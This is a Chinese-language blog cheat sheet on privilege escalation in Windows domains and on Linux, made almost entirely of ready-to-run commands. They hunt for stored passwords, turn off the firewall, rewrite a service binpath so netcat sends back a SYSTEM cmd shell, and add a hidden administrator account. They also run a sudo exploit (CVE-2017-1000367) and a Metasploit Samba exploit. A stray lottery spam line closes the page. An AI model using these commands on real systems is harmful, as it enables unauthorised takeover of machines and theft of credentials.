?

May 11 2019

域滲透(提權篇)

首頁 » 滲透測試 » 域滲透(提權篇)   

域滲透(提權篇)

常見信息收集
dir /a-r-d /s /b                                 檢查文件夾可寫狀態
dir /b/s password.txt                            查找密碼文件或其它敏感文件
dir /b/s config.*
findstr /si password *.xml *.ini *.txt
findstr /si login *.xml *.ini *.txt
C:\sysprep.inf
C:\sysprep\sysprep.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
dir /s *pass* == *cred* == *vnc* == *.config*    搜索system32關鍵字的文件
findstr /si password *.xml *.ini *.txt           搜索某些特定的文件類型
reg query HKLM /f password /t REG_SZ /s          搜索注冊表中包含password
reg query HKCU /f password /t REG_SZ /s
netsh firewall show config                       顯示 Windows 防火墻配置
netsh firewall show state                        顯示 Windows 防火墻的當前狀態
netsh firewall set opmode disable                關閉防火墻
netsh advfilewall set publicprofile state off
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"    獲取操作系統信息
systeminfo | findstr /B /C:"OS 名稱" /C:"OS 版本"        
schtasks /query /fo LIST /v                      計劃任務 [國外調整 chcp 437]
route print                                      查看路由表
arp -A                                           查看ARP緩存
upnphost提權
sc qc Spooler                 查詢,配置,和管理Windows服務
accesschk.exe -ucqv Spooler   檢查每個服務需要的權限   XP_SP2被修復
攻擊手法:
    sc qc upnphost
        sc  config  upnphost  binpath=  "C:\nc.exe  -nv  127.0.0.1  9988  -e  
C:\WINDOWS\System32\cmd.exe"
    sc config upnphost obj= ".\LocalSystem" password= ""
    sc qc upnphost
    net start upnphost
    執行netcat并且使用SYSTEM權限反彈一個shell
    sc config PFNET binpath= "net user admin [email protected]! /add"
    sc stop PFNET
    sc start PFNET
    sc config PFNET binpath= "net localgroup Administrators admin /add"
    sc stop PFNET
    sc start PFNET
服務與權限
DRIVERQUERY                 安裝驅動
wmic product list brief     查看安裝程序和版本信息. [可能存在漏洞]
wmic service list brief     查看服務、進程和啟動程序信息
wmic process list brief
wmic startup list brief
wmic qfe get Caption,Description,HotFixID,InstalledOn   查看安裝補丁和時間信息
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KBxxxxxxx"
wimc process where(description="進程名")       結合tasklist /svc
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v
"C:\Windows\\" |findstr /i /v """    列出目標機器上所有沒有用引號包含的服務路徑
tasklist /v /fo list /fi "USERNAME eq NT AUTHORITY\SYSTEM"  篩選NT AUTHORITY\SYSTEM權
限進程
icacls "C:\Program Files (x86)\360"     查看路徑中受影響文件夾的權限
補丁對應Exp
補丁對比 https://github.com/GDSSecurity/Windows-Exploit-Suggester
pip install xlrd --upgrade
./windows-exploit-suggester.py --update
[+] writing to file 2014-06-06-mssb.xlsx
輸入“systeminfo”輸入,并將其指向微軟數據庫
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo     win7sp1-
systeminfo.txt
未修補漏洞存在的exp
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --ostext     'windows server
2008 r2'
AlwaysInstallElevated提權
http://www.greyhathacker.net/?p=185
如果這個設置被啟用,它允許任何權限的用戶暫時使用NT AUTHORITY\SYSTEM權限來安裝*.msi文
件。
AlwaysInstallElevated且它的DWORD值是1才有效。
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/SecWiki/linux-kernel-exploits
可以利用Advanced Installer(http://www.advancedinstaller.com/)生成msi安裝包
查看.msi程序的執行權限
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
查看是否設置有setuid和setgid
reg  query
HKEY_Local_Machine\System\CurrentControlSet\Services\NfsSvr\Parameters\SafeSetUidGidBits
CVE-2017-1000367
    系統必須啟用selinux
    sudo需要用selinux支持(sudo -r)
    用戶需要具有sudo權限
gcc -o sudopwn sudopwn.c -lutil
./sudopwn
枚舉系統設置和權限的檢查
http://www.securitysift.com/download/linuxprivchecker.py
基于操作系統的內核版本號
https://github.com/PenturaLabs/Linux_Exploit_Suggester
./Linux_Exploit_Suggester.pl -k 內核版本號[例如3.10,結合uname -a]
檢測權限提升向量的shell腳本
https://github.com/pentestmonkey/unix-privesc-check
unix-privesc-check standard
unix-privesc-check detailed
下載和解壓縮腳本RootHelper
https://github.com/NullArray/RootHelper
CVE-2017-7494[Samba]
http://fuping.site/2017/05/25/Samba-Remote-Code-Execution-Vulnerability-Replication/
use exploit/linux/samba/is_known_pipename
set RHOST 192.168.232.137
set target 3
exploit
內核提權
lsb_release -a
uname -a
python -c 'import pty; pty.spawn("/bin/bash")'
suid 提權 [有限制]
find / -perm -u=s -type f 2>/dev/null
from:
https://04z.net/2017/07/10/AD-Attacks-go/

正文部分到此結束

文章標簽: 域滲透

版權聲明:若無特殊注明,本文皆為( mOon )原創,轉載請保留文章出處。

也許喜歡: «Thinkphp5.1 ~ 5.2代碼執行漏洞 | JSONP與CORS漏洞挖掘»

你腫么看?

你還可以輸入 250/250 個字

? 微笑 大笑 拽 大哭 親親 流汗 噴血 奸笑 囧 不爽 暈 示愛 害羞 吃驚 驚嘆 愛你 嚇死了 呵呵

評論信息框

這篇文章還沒有收到評論,趕緊來搶沙發吧~

?
?
河北11选5开奖